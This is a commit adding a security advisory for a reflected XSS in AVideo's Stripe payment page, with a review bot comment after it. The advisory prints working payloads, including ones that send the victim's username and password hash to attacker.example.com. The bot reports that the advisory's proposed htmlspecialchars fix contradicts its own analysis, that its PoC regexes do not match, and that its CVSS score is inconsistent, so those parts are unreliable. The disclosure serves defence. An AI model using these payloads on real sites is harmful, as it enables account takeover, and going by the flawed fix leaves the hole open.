
Commit cb9e47a

1 parent ff52aff commit cb9e47a

1 file changed

Lines changed: 65 additions & 0 deletions

@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-pm37-62g7-p768",
4+
"modified": "2026-03-30T18:08:52Z",
5+
"published": "2026-03-30T18:08:52Z",
6+
"aliases": [
7+
"CVE-2026-34375"
8+
],
9+
"summary": "AVideo Vulnerable to Reflected XSS via Unsanitized plugin Parameter in YPTWallet Stripe Payment Page",
10+
"details": "## Summary\n\nThe YPTWallet Stripe payment confirmation page directly echoes the `$_REQUEST['plugin']` parameter into a JavaScript block without any encoding or sanitization. The `plugin` parameter is not included in any of the framework's input filter lists defined in `security.php`, so it passes through completely raw. An attacker can inject arbitrary JavaScript by crafting a malicious URL and sending it to a victim user.\n\nThe same script block also outputs the current user's username and password hash via `User::getUserName()` and `User::getUserPass()`, meaning a successful XSS exploitation can immediately exfiltrate these credentials.\n\n## Details\n\nThe Stripe confirmation page renders the `plugin` parameter directly into a `<script>` block:\n\n```php\n// plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php:116\n\"plugin\": \"<?php echo @$_REQUEST['plugin']; ?>\",\n```\n\nThis appears inside a `$.ajax()` data object within a `<script>` tag. Because the value is injected into a JavaScript string context (not HTML), standard HTML entity encoding would not be sufficient even if it were applied. 
However, no encoding of any kind is performed.\n\nThe `plugin` parameter is not present in any of the sanitization or filtering arrays in `security.php`, so it arrives completely unmodified.\n\nImmediately adjacent to the injection point, the script also exposes user credentials:\n\n```php\n// plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php:117-118\n\"user\": \"<?php echo User::getUserName() ?>\",\n\"pass\": \"<?php echo User::getUserPass(); ?>\",\n```\n\nNo Content-Security-Policy headers are configured on the application, so inline script execution is unrestricted.\n\n## Proof of Concept\n\nThe XSS is reachable through the `addFunds.php` page which includes the vulnerable `confirmButton.php` template:\n\n```\nhttps://your-avideo-instance.com/plugin/YPTWallet/view/addFunds.php?plugin=%22}})});alert(document.domain);console.log({/*\n```\n\nThe injected value closes the JSON string and the `$.ajax()` call, then executes `alert(document.domain)`. The response contains the payload unencoded in the script block:\n\n```javascript\n\"plugin\": \"\"}})});alert(document.domain);console.log({/*\",\n```\n\nCredential exfiltration payload:\n\n```\nhttps://your-avideo-instance.com/plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php?plugin=\",x:fetch('https://attacker.example.com/steal?'+document.querySelector('script').textContent.match(/pass.*?\"(.*?)\"/)[1]),y:\"\n```\n\nSimplified credential theft using the same-page credential leak:\n\n```html\n<!-- Host this on attacker.example.com and send the link to a victim -->\n<html>\n<body>\n<script>\n // The confirmButton.php page outputs user/pass in the script block.\n // XSS lets us read it directly.\n var payload = encodeURIComponent(\n '\",x:(function(){' +\n 'var s=document.querySelector(\"script\").textContent;' +\n 'var u=s.match(/\"user\":\"([^\"]+)\"/)[1];' +\n 'var p=s.match(/\"pass\":\"([^\"]+)\"/)[1];' +\n 'new Image().src=\"https://attacker.example.com/log?u=\"+u+\"&p=\"+p;' +\n '})(),y:\"'\n );\n 
window.location = \"https://your-avideo-instance.com/plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php?plugin=\" + payload;\n</script>\n</body>\n</html>\n```\n\nReproduction steps:\n\n1. Navigate to the basic XSS URL above (substitute your target instance).\n2. Observe the JavaScript alert box confirming code execution.\n3. View the page source to confirm that `User::getUserName()` and `User::getUserPass()` are present in the same script block.\n4. Use the credential exfiltration payload to demonstrate data theft.\n\n## Impact\n\nAn attacker can execute arbitrary JavaScript in the context of any authenticated user who clicks a crafted link. The impact is amplified by the credential leak on the same page:\n\n- **Immediate credential theft**: The page already renders the victim's username and password hash in the script block. The XSS payload can read and exfiltrate these values without any additional requests.\n- **Session hijacking**: Steal session cookies and impersonate the victim.\n- **Payment manipulation**: Since this is a payment confirmation page, the attacker can modify payment amounts, redirect payment confirmations, or trigger unauthorized transactions.\n- **Account takeover**: Combine the stolen password hash with the username for offline cracking or direct replay.\n\nThe lack of CSP headers means there are no browser-side mitigations against the injected scripts.\n\n- **CWE**: CWE-79 (Cross-Site Scripting - Reflected)\n- **Severity**: High (CVSS 8.1)\n\n## Recommended Fix\n\nApply `htmlspecialchars()` to the `plugin` parameter at `plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php:116`:\n\n```php\n// plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php:116\n// Before:\n\"plugin\": \"<?php echo @$_REQUEST['plugin']; ?>\",\n\n// After:\n\"plugin\": \"<?php echo htmlspecialchars(@$_REQUEST['plugin'], ENT_QUOTES, 'UTF-8'); ?>\",\n```\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "wwbn/avideo"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"last_affected": "26.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pm37-62g7-p768"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34375"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/WWBN/AVideo/commit/fa0bc102493a15d79fe03f86c07ab7ca1b5b63e2"
50+
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/WWBN/AVideo"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-79"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-03-30T18:08:52Z",
63+
"nvd_published_at": "2026-03-27T19:16:43Z"
64+
}
65+
}
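Review bot: the Recommended Fix in the `details` field (hunk line 10) contradicts the analysis given earlier in the same field. Details states that the value is injected into a JavaScript string context inside a `<script>` block and that "standard HTML entity encoding would not be sufficient even if it were applied", yet the fix it proposes is `"plugin": "<?php echo htmlspecialchars(@$_REQUEST['plugin'], ENT_QUOTES, 'UTF-8'); ?>",`. With ENT_QUOTES that does remove the `"` and `<` the shown payloads rely on, but it leaves backslashes and the JavaScript line terminators U+2028/U+2029 untouched and is simply the wrong encoder for the context. The advisory should recommend emitting the value as a JSON/JS literal, e.g. `"plugin": <?php echo json_encode((string)($_REQUEST['plugin'] ?? ''), JSON_HEX_TAG | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_HEX_APOS); ?>,` (note the template's own surrounding quotes are dropped, since json_encode supplies them), and preferably validating `plugin` against the installed plugin names before it is echoed at all, since the template reads the `@`-suppressed raw `$_REQUEST` value. Two smaller consistency problems in the same field: the PoC regexes do not match the template as quoted. The "Simplified credential theft" payload uses `/"user":"([^"]+)"/` and `/"pass":"([^"]+)"/` with no space after the colon, while the quoted template lines are `"user": "<?php echo User::getUserName() ?>",` and `"pass": "<?php echo User::getUserPass(); ?>",` with a space, so `match(...)` returns null and the `[1]` access throws; and the earlier `/pass.*?"(.*?)"/` would capture the `: ` between the key's closing quote and the value's opening quote rather than the hash. Both also assume `document.querySelector('script')` returns the script that contains the `$.ajax()` block, which the advisory does not establish. Finally, the text says "Severity: High (CVSS 8.1)" while the vector in the `severity` array, `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N`, scores 8.2 under the CVSS 3.1 formula (8.1 is the score of the unchanged-scope C:H/I:H/A:N variant); either the vector or the stated score should be corrected so the two agree.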
